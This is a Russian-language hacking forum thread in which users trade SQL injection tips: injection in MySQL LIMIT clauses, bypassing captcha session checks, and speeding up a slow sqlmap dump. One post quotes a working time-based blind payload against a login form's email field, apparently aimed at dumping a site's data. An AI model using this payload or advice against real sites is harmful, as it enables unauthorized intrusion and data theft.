ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2621  
Старый 04.06.2019, 23:31
Тот_самый_Щуп
Участник форума
Регистрация: 23.03.2017
Сообщений: 265
С нами: 4812086

Репутация: 119
По умолчанию

Подскажите, есть ли на текущий момент вариант провести Mysql иньект в лимите, если версия Mysql > 5.6 ? Трюк с procedure analyse не прокатывает, но возможно есть ещё какие техники? Буду признателен, если кто подскажет.
 
Ответить с цитированием

  #2622  
Старый 09.06.2019, 02:17
RWD
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
С нами: 6868406

Репутация: 2
По умолчанию

 
Ответить с цитированием

  #2623  
Старый 19.06.2019, 10:08
madam
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами: 6384566

Репутация: 1
По умолчанию

После каждого SQL запроса

Session halted.

Сессия остановлена,как можно это решить,вводить капчу каждый раз муторно
 
Ответить с цитированием

  #2624  
Старый 19.06.2019, 10:54
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
С нами: 11278406

Репутация: 818


По умолчанию

Цитата:
Сообщение от madam  
↑
После каждого SQL запроса
Session halted.
Сессия остановлена,как можно это решить,вводить капчу каждый раз муторно
Все заголовки отлавливать и использовать, возможно CSRF токен мешает
 
Ответить с цитированием

  #2625  
Старый 20.06.2019, 15:09
AngelEyes
Новичок
Регистрация: 20.06.2019
Сообщений: 7
С нами: 3632726

Репутация: 0
По умолчанию

Parameter: useremail (POST)

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: useremail=Bqyn' AND (SELECT 6177 FROM (SELECT(SLEEP(10)))qdTp) AND 'sRZa'='sRZa&password=&signin=fgtI

Скорость дампа просто ужасная!по 1 символу в минуту показывает.дописал --threads 10,но тогда перестало какие либо символы выдавать( везде)

Подскажите новичку,можно ли это как-то фиксануть?Или же поставить на дамп и забыть на месяц?))

[ERROR] invalid character detected. retrying..

[WARNING] increasing time delay to 4 seconds
 
Ответить с цитированием

  #2626  
Старый 20.06.2019, 17:11
RWD
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
С нами: 6868406

Репутация: 2
По умолчанию

Цитата:
Сообщение от AngelEyes  
↑
Parameter: useremail (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: useremail=Bqyn' AND (SELECT 6177 FROM (SELECT(SLEEP(10)))qdTp) AND 'sRZa'='sRZa&password=&signin=fgtI
Скорость дампа просто ужасная!по 1 символу в минуту показывает.дописал --threads 10,но тогда перестало какие либо символы выдавать( везде)
Подскажите новичку,можно ли это как-то фиксануть?Или же поставить на дамп и забыть на месяц?))
[ERROR] invalid character detected. retrying..
[WARNING] increasing time delay to 4 seconds
если есть такое, вполне возможно есть и другие скули, поищите хорошо.
 
Ответить с цитированием

  #2627  
Старый 20.06.2019, 17:13
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Цитата:
Сообщение от AngelEyes  
↑
Parameter: useremail (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: useremail=Bqyn' AND (SELECT 6177 FROM (SELECT(SLEEP(10)))qdTp) AND 'sRZa'='sRZa&password=&signin=fgtI
Скорость дампа просто ужасная!по 1 символу в минуту показывает.дописал --threads 10,но тогда перестало какие либо символы выдавать( везде)
Подскажите новичку,можно ли это как-то фиксануть?Или же поставить на дамп и забыть на месяц?))
[ERROR] invalid character detected. retrying..
[WARNING] increasing time delay to 4 seconds
Oob
 
Ответить с цитированием

  #2628  
Старый 20.06.2019, 18:59
AngelEyes
Новичок
Регистрация: 20.06.2019
Сообщений: 7
С нами: 3632726

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  
↑
Oob
Если это ответ,то можно поподробней=)
 
Ответить с цитированием

  #2629  
Старый 20.06.2019, 19:02
AngelEyes
Новичок
Регистрация: 20.06.2019
Сообщений: 7
С нами: 3632726

Репутация: 0
По умолчанию

Цитата:
Сообщение от RWD  
↑
если есть такое, вполне возможно есть и другие скули, поищите хорошо.
Пара разных пейлоадов,пробовал через оба,но итог один и тот же
 
Ответить с цитированием

  #2630  
Старый 20.06.2019, 19:10
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Цитата:
Сообщение от AngelEyes  
↑
Если это ответ,то можно поподробней=)
https://www.acunetix.com/blog/artic...ction-vulnerability-testing-added-acumonitor/
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.